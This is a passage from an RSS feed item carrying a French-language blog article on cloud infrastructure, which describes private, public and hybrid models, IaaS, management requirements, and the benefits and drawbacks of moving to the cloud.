financer. Un cloud privé a du sens, par exemple, si l'activité d'une entreprise tourne autour d'une application et de ses données. </li></ul><p></p><ul><li><strong>Public</strong> : une architecture de cloud public est un service fourni, géré et maintenu hors site via Internet. Cette méthode peut aider à rationaliser les flux de travail et la collaboration sur les applications avec de nombreux utilisateurs (e-mail, par exemple), rendant le partage des ressources plus efficace. Cependant, le risque de vulnérabilité est plus élevé avec une offre publique. Un cloud public a du sens, par exemple, si une entreprise travaille sur un projet de développement logiciel ad-hoc avec une offre PaaS. </li></ul><p></p><ul><li><strong>Hybride</strong> : une architecture de cloud hybride comprend une combinaison d'offres de cloud privé et public. Cette offre offre efficacité avec un cloud public et sécurité avec un cloud privé, mais une entreprise doit gérer de nombreuses plateformes à la fois tout en garantissant une intégration transparente des API. Un cloud hybride est le plus logique, par exemple, si une entreprise souhaite activer une application SaaS tout en privilégiant la sécurité. Par conséquent, le fournisseur SaaS créerait un cloud privé au sein de son pare-feu.</li></ul><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="infrastructure-cloud-en-tant-que-service">Infrastructure cloud en tant que service </h2><p>Une infrastructure cloud en tant que service (IaaS), comme pour toute technologie cloud, est accessible via Internet via le centre de données d'un fournisseur de cloud, qui est responsable de la maintenance et de la gestion du matériel traditionnel sur site comme les serveurs et autres périphériques de stockage ainsi que la mise en réseau et la visualisation. Cela signifie que le client a la liberté et le contrôle pour gérer les applications, les données, les middleware et autres systèmes d'exploitation. </p><p>Avec une solution cloud IaaS, il existe des services d'infrastructure importants tels que la surveillance du réseau, la sécurité, la facturation, la reprise après sinistre et l'équilibrage de charge. Il existe également une automatisation et une orchestration avancées pour simplifier les performances et la gestion des applications, ainsi que pour faciliter l'installation de systèmes d'exploitation, le déploiement de middleware, le lancement de machines virtuelles et la création de stockage et de sauvegardes de charges de travail.</p><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="gestion-de-linfrastructure-cloud">Gestion de l'infrastructure cloud</h2><p>L'objectif principal de la gestion de l'infrastructure cloud est de fournir une évolutivité de l'entreprise tout en consolidant les ressources informatiques et en permettant à une variété d'utilisateurs de partager la même infrastructure sans compromettre les données des uns et des autres. À long terme, cela réduit les coûts d'exploitation.</p><p>Une interface de gestion d'infrastructure cloud (CIMI) est une exigence d'API standard ouverte pour la gestion de l'infrastructure cloud et permet aux utilisateurs de la gérer de manière simplifiée avec une communication homogène entre les écosystèmes cloud. Cela permet d'obtenir une gestion interopérable entre les fournisseurs de cloud, les développeurs et les clients.</p><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="conditions-requises-pour-la-cr%C3%A9ation-dune-infrastructure-cloud">Conditions requises pour la création d'une infrastructure cloud</h2><p>Lors de l'élaboration d'une stratégie cloud, plusieurs étapes approfondies doivent être suivies pour garantir une infrastructure robuste.</p><h3 id="1gestion-des-services-et-des-ressources">1 - Gestion des services et des ressources</h3><p>Une infrastructure cloud virtualise tous les composants d'un datacenter. La gestion des services est un ensemble mesuré d'applications et de services que les utilisateurs finaux peuvent facilement déployer et gérer via un fournisseur de cloud public et/ou privé. Et un outil simplifié pour décrire et évaluer les services est vital pour les administrateurs cloud pour commercialiser les fonctionnalités. La gestion des services doit contenir la maintenance des ressources, les garanties de ressources, les cycles de facturation et les réglementations mesurées. Une fois déployés, les services de gestion doivent aider à créer des politiques pour les données et les flux de travail afin de s'assurer qu'ils sont pleinement efficaces et que les processus sont fournis aux systèmes dans le cloud.</p><h3 id="2int%C3%A9gration-des-outils-de-gestion-de-centre-de-donn%C3%A9es"><strong>2 - </strong>Intégration des outils de gestion de centre de données</h3><p>La plupart des centres de données utilisent une variété d'outils informatiques pour la gestion des systèmes, la sécurité, l'approvisionnement, le service client, la facturation et les annuaires, entre autres. Et ceux-ci fonctionnent avec des services de gestion cloud et des API ouvertes pour intégrer les systèmes d'exploitation, d'administration, de maintenance et de provisionnement (OAM&amp;P) existants. Un service cloud moderne doit prendre en charge l'infrastructure existante d'un centre de données ainsi que tirer parti des logiciels, du matériel, de la virtualisation et d'autres technologies modernes.</p><h3 id="3reporting-visibilit%C3%A9-fiabilit%C3%A9-s%C3%A9curit%C3%A9"><strong>3 - </strong>Reporting, Visibilité, Fiabilité, Sécurité</h3><p>Les centres de données ont besoin de niveaux élevés de capacités de reporting et de visibilité en temps réel dans les environnements cloud pour garantir la conformité, les SLA, la sécurité, la facturation et les rétrofacturations. Sans rapports et visibilité solides, la gestion des performances du système, du service client et d'autres processus est presque impossible. Et pour être totalement fiables, les infrastructures cloud doivent fonctionner indépendamment d'un ou plusieurs composants défaillants. Pour protéger le cloud, les services doivent garantir la sécurité des données et des applications tout en fournissant un accès aux personnes autorisées.</p><h3 id="4interfaces-pour-les-utilisateurs-les-administrateurs-et-les-d%C3%A9veloppeurs"><strong>4 - </strong>Interfaces pour les utilisateurs, les administrateurs et les développeurs</h3><p>Le déploiement automatisé et les interfaces en libre-service facilitent les services cloud complexes pour les utilisateurs finaux, ce qui contribue à réduire les coûts d'exploitation et à favoriser l'adoption. Les interfaces en libre-service offrent aux clients la possibilité de lancer efficacement un service cloud en gérant virtuellement leurs propres centres de données, en concevant et en pilotant des modèles, en gérant le stockage virtuel, les ressources réseau et en utilisant des bibliothèques. Les interfaces administrateur présentent une meilleure visibilité sur toutes les ressources, machines virtuelles, modèles, offres de services et divers utilisateurs du cloud. Et toutes ces structures s'intègrent via des API pour les développeurs.</p><p></p><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="avantages-de-lutilisation-de-linfrastructure-cloud">Avantages de l'utilisation de l'infrastructure cloud</h2><p>Les arguments en faveur de l'utilisation du cloud ne font que se renforcer à mesure que la technologie continue de s'améliorer. Ainsi, la migration vers une infrastructure cloud qui aide les entreprises à rationaliser les processus métier présente des avantages clés évidents.</p><ul><li><strong>Coût </strong>: Avant tout, le cloud supprime ou réduit considérablement les dépenses d'exploitation d'une entreprise qui met en place et gère son propre centre de données. La prise en charge de ce processus commence à s'additionner avec tous les divers matériels, logiciels, serveurs, factures d'énergie, experts informatiques et les mises à jour qui accompagnent cette configuration à multiples facettes. Avec l'infrastructure cloud, une entreprise paie simplement pour que tout soit géré tout en ne payant que pour les services nécessaires.</li></ul><p></p><ul><li><strong>Agilité et flexibilité </strong>: la plupart des infrastructures de services cloud sont proposées comme autogérées, où les modifications de service peuvent être apportées en quelques minutes. Cela améliore la disponibilité et l'efficacité des systèmes d'entreprise tout en permettant aux collègues et partenaires hors site d'accéder aux données partagées sur les appareils mobiles à tout moment et en tout lieu. Et avec une infrastructure cloud gérant les processus, une entreprise devient plus axée sur les affaires que sur l'informatique.</li></ul><p></p><ul><li><strong>Sécurité</strong> : il existe une idée fausse répandue selon laquelle les services cloud ne sont généralement pas sécurisés et que les données peuvent facilement être compromises. Il y a une part de vérité dans le fait que, cependant, les risques sont souvent exagérés, au moins en termes d'infrastructure et de services cloud au niveau de l'entreprise. Les technologies et les fournisseurs d'infrastructure cloud améliorent toujours la protection contre les pirates, les virus et autres violations de données avec des pare-feu plus puissants, des clés de chiffrement avancées et une approche hybride qui stocke les données sensibles dans un cloud privé et d'autres données, même des applications, dans un cloud public.</li></ul><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="inconv%C3%A9nients-de-lutilisation-de-linfrastructure-cloud">Inconvénients de l'utilisation de l'infrastructure cloud</h2><p>Cela étant dit, toutes les infrastructures cloud ne sont pas parfaites. Et s'il y a bien plus d'avantages, il y a quand même quelques inconvénients.</p><ul><li><strong>Renversement de fournisseur </strong>: le cloud est toujours une technologie en évolution, mais en amélioration, qui fluctue rapidement. Cela signifie que certaines sociétés de services cloud font les choses correctement et d'autres non. Si une entreprise fait faillite ou subit une refonte massive, cela pourrait être destructeur pour une entreprise qui repose sur une seule infrastructure.</li></ul><p></p><ul><li><strong>Dépendance de la connexion</strong> : une infrastructure cloud est aussi bonne que sa connexion réseau. Par conséquent, le cloud ne peut pas rester à flot sans une connexion fiable. Tout problème dans une connexion Internet ou intranet en raison d'une panne technique ou d'une tempête signifie que le cloud tombe en panne avec toutes les données, logiciels et/ou applications qu'il contient. Un réseau fiable signifie que les promesses commerciales et les SLA sont tenus.</li></ul><p></p><ul><li><strong>Contrôle</strong> : étant donné que l'infrastructure cloud d'une entreprise est généralement contrôlée par son fournisseur de services, il arrive parfois que les organisations aient un accès limité aux données. Et les clients professionnels ont encore moins de contrôle qu'ils ne le souhaiteraient, avec un accès limité aux applications, données et outils stockés sur un serveur.</li></ul><!--kg-card-begin: html--><br /><!--kg-card-end: html--><h2 id="la-ligne-de-front-de-la-transformation-num%C3%A9rique">La ligne de front de la transformation numérique</h2><p>Au fur et à mesure que la technologie de la plate-forme d'intégration cloud continue d'évoluer et de s'améliorer, elle deviendra encore plus une aubaine pour les entreprises qui cherchent à moins s'occuper de la maintenance et de la gestion de leurs propres serveurs et autres outils de stockage. Qu'une organisation se tourne vers une infrastructure cloud unique ou une infrastructure multi-cloud, la progression du cloud dans son ensemble et des services qui l'accompagnent permet à une entreprise d'être en première ligne à l'ère de la transformation numérique.</p> ]]></content:encoded>
                </item>

    </channel>
</rss>